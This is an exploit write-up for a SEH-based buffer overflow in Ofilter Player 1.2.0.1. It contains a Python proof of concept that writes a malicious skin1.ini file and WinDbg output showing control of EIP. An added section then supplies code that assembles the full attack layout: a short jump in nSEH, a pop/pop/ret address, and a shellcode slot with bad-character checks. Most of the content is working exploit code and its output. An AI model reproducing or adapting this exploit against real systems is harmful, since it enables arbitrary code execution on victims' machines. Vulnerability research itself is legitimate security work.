Ofilter Player 1.2.0.1 Buffer Overflow Vulnerability
Source: http://www.cr0security.com   Author: gunslinger   Published: 2013-09-16
# Exploit Title     : Ofilter Player Version 1.2.0.1 - (skin1.ini) - SEH Based Buffer Overflow PoC
# Date              : 12-09-2013
# Exploit Author    : gunslinger_ <yuda at cr0security.com>
# Author Homepage   : http://www.cr0security.com
# Price             : Free to try; $19.99 to buy
# Version           : 1.2.0.1 (probably both an older release of the software and the latest one)
# Vendor            : DigitByte Studio
# Vendor Homepage   : http://www.008soft.com/
# Tested on         : Windows XP SP3
#============================================================================================
# Ofilter Player is prone to an SEH-based buffer overflow that lets an attacker execute arbitrary code on the victim's machine.
# To trigger the vulnerability the attacker must overwrite the file skin1.ini in the skin folder of the Ofilter Player installation directory (so write access to that folder is required).
# When Ofilter Player is then started and reads the values from skin1.ini, the SEH record on the stack is overwritten; as soon as the first access violation is dispatched, the handler address taken from the file ends up in EIP (see the debugger output below).
# The exploit will look like this: [Junk "A" x 360] [nSEH: short jump over the next 6 bytes + 2 NOPs, 4 bytes in total] [SEH: pop pop ret address, or another suitable gadget] [Shellcode].
# Crash triggered + SEH overwritten.
#============================================================================================
#!/usr/bin/python
'''
0:000> g
ModLoad: 773d0000 774d3000   C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
ModLoad: 5ad70000 5ada8000   C:\WINDOWS\system32\uxtheme.dll
(658.3f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000018c ebx=00000000 ecx=41414141 edx=0012df77 esi=00000171 edi=00000171
eip=0040161d esp=0012ddc4 ebp=0012df08 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x161d:
0040161d 8b41f4          mov     eax,dword ptr [ecx-0Ch] ds:0023:41414135=????????
0:000> g
(658.3f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=bbbbbbbb edx=7c9032bc esi=00000000 edi=00000000
eip=bbbbbbbb esp=0012d9f4 ebp=0012da14 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
bbbbbbbb ??              ???
0:000> !exchain
0012da08: ntdll!ExecuteHandler2+3a (7c9032bc)
0012df54: bbbbbbbb
Invalid exception stack at cccccccc
'''
from struct import pack

filename    = "skin1.ini"

# Crash layout: 360 bytes of filler reach the SEH record on the stack.
# Both pointers are replaced by recognisable markers, which is what the
# debugger output above shows (eip=bbbbbbbb, invalid exception stack at cccccccc).
junk        = b"\x41" * 360                 # "A" x 360
nextSEH     = pack("<I", 0xcccccccc)        # next-SEH pointer marker
SEH         = pack("<I", 0xbbbbbbbb)        # handler pointer marker -> lands in EIP

trigger_seh = junk + nextSEH + SEH

# Stock "Gold" skin definition; the overflow is in the control-ID field
# of [BUTTON] entry 13. Built as bytes so the script runs under Python 2 and 3.
ini_content = b"""[BACKGROUND]
Mask=GoldMask.bmp
Main=GoldMain.bmp
Selected=GoldSelected.bmp
Over=GoldOver.bmp
Disabled=GoldDisable.bmp

[BUTTON]
1=ID_FILE_EXIT,273,10,9,9,Exit,FALSE
2=ID_BUTTON_MINIMIZE,261,10,9,9,MINIMIZE,FALSE
3=IDC_BUTTON1_FILELIST_LOOP,229,85,42,21,FILE,FALSE
4=ID_JUMP_FORWARD,103,91,16,15,Skip Forward,FALSE
5=ID_PLAYBACK_NEXTCHAPTER,119,91,16,15,Next,FALSE
6=ID_PLAYBACK_PREVIOUSCHAPTER,23,91,16,15,Previous,FALSE
7=ID_PLAYBACK_STOP,86,91,17,15,Stop,FALSE
8=ID_PLAYBACK_PAUSE,71,91,15,15,Pause,FALSE
9=ID_PLAYBACK_PLAY,53,91,18,15,Play,FALSE
10=ID_JUMP_BACKWARD,38,91,15,15,Skip Backward,FALSE
11=ID_FILE_SELECTDISC,145,85,41,21,Open Media Files,FALSE
12=ID_WEBSITE,117,8,69,16,Website,FALSE
13=%s,186,85,42,21,Open VCD,FALSE
14=ID_POPUP_HELP,251,10,9,9,Popup,FALSE

[TRACKBARINFO]
1=IDC_SLIDER1_PLAYBACK_POSITION,Goldbutton1.bmp,Goldbutton1.bmp,23,69,247,6,H,100
2=IDC_SLIDER1_VOLUME,Goldbutton2.bmp,Goldbutton2.bmp,23,79,113,6,H,100

[PLAY]
1=ID_PLAYBACK_TIME,Arial,TRUE,TRUE,-14,32768,100,43,160,16,
2=PLAY,Arial,TRUE,TRUE,-14,32768,34,43,50,16,10""" % (trigger_seh,)

# Write the malicious skin file; copy it over <install dir>\skin\skin1.ini and start the player.
with open(filename, "wb") as textfile:
    textfile.write(ini_content)
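The PoC above only plants markers in the SEH record. The layout the header describes, [Junk "A" x 360] [short jump + 2 NOPs] [pop pop ret] [Shellcode], still has to be assembled and sanity-checked before it is pasted into the skin file. The following is an added example, not part of gunslinger's PoC or of the vendor's software: it builds that layout and verifies the arithmetic a practitioner checks first (the short jump in the nSEH slot must land exactly on the shellcode, the SEH slot must hold the gadget address little-endian, and nothing in the buffer may terminate the INI line). The pop/pop/ret address, the int3 shellcode and the list of INI-breaking bytes are assumptions for illustration; the page gives none of them.

```python
# Added example (not from the original page): assemble and check the
# [junk x 360][nSEH][SEH][shellcode] layout described in the advisory.
import struct

JUNK_LEN = 360                # bytes of "A" before the SEH record, as in the PoC
NSEH_OFF = JUNK_LEN           # 360: next-SEH pointer slot (0xcccccccc in the PoC)
SEH_OFF = JUNK_LEN + 4        # 364: handler pointer slot (0xbbbbbbbb in the PoC, lands in EIP)
SHELLCODE_OFF = JUNK_LEN + 8  # 368: first byte after the 8-byte SEH record

# Bytes that would terminate or split an INI line. Assumption: the page lists no bad chars.
INI_BAD_BYTES = b"\x00\x0a\x0d"


def nseh_short_jump(skip=6):
    """Four bytes for the nSEH slot: 'jmp short +skip' followed by two NOPs."""
    return b"\xeb" + struct.pack("B", skip) + b"\x90\x90"


def build_seh_payload(ppr_addr, shellcode, junk_byte=b"A"):
    """[junk x 360][jmp short +6, nop, nop][pop/pop/ret address, little-endian][shellcode]."""
    return (junk_byte * JUNK_LEN
            + nseh_short_jump()
            + struct.pack("<I", ppr_addr)
            + shellcode)


def short_jump_target(buf, off):
    """Landing offset of the 'jmp short rel8' at buf[off]; rel8 counts from the end of the 2-byte opcode."""
    if buf[off] != 0xEB:
        raise ValueError("no short jump at offset %d" % off)
    rel = struct.unpack("b", buf[off + 1:off + 2])[0]
    return off + 2 + rel


def find_markers(buf, nseh_marker, seh_marker):
    """Offsets of the two markers in a crash buffer (what !exchain showed as cccccccc / bbbbbbbb)."""
    return buf.find(nseh_marker), buf.find(seh_marker)


def check_payload(payload, ppr_addr, shellcode):
    """Return a list of layout problems; an empty list means the buffer matches the advisory's layout."""
    problems = []
    try:
        landing = short_jump_target(payload, NSEH_OFF)
    except ValueError:
        landing = None
    if landing != SHELLCODE_OFF:
        problems.append("nSEH jump does not land on the shellcode")
    if payload[SEH_OFF:SEH_OFF + 4] != struct.pack("<I", ppr_addr):
        problems.append("SEH slot does not hold the pop/pop/ret address")
    if payload[SHELLCODE_OFF:SHELLCODE_OFF + len(shellcode)] != shellcode:
        problems.append("shellcode is not at offset %d" % SHELLCODE_OFF)
    bad = [hex(b) for b in INI_BAD_BYTES if b in payload]
    if bad:
        problems.append("INI-breaking bytes present: %s" % ", ".join(bad))
    return problems


if __name__ == "__main__":
    # Placeholders (assumptions): a null-free pop/pop/ret address and int3 shellcode.
    PPR = 0x10203040
    SHELLCODE = b"\xcc" * 16
    # Constructed crash buffer with the PoC's markers, to show offset recovery.
    crash = b"A" * JUNK_LEN + b"\xcc\xcc\xcc\xcc" + b"\xbb\xbb\xbb\xbb"
    print("markers at", find_markers(crash, b"\xcc" * 4, b"\xbb" * 4))
    payload = build_seh_payload(PPR, SHELLCODE)
    print("problems:", check_payload(payload, PPR, SHELLCODE) or "none")
```

The jump in the nSEH slot is `EB 06`: the displacement is relative to the end of the two-byte instruction at offset 362, so it lands at 368, the first shellcode byte after the 4-byte handler pointer. A gadget address containing 0x00, 0x0a or 0x0d would cut the `13=...` line short before the parser ever reaches the SEH record, which is why the check refuses such addresses; whether other bytes (for example the comma that separates the INI fields) also need to be avoided is not stated on the page and has to be confirmed in the debugger.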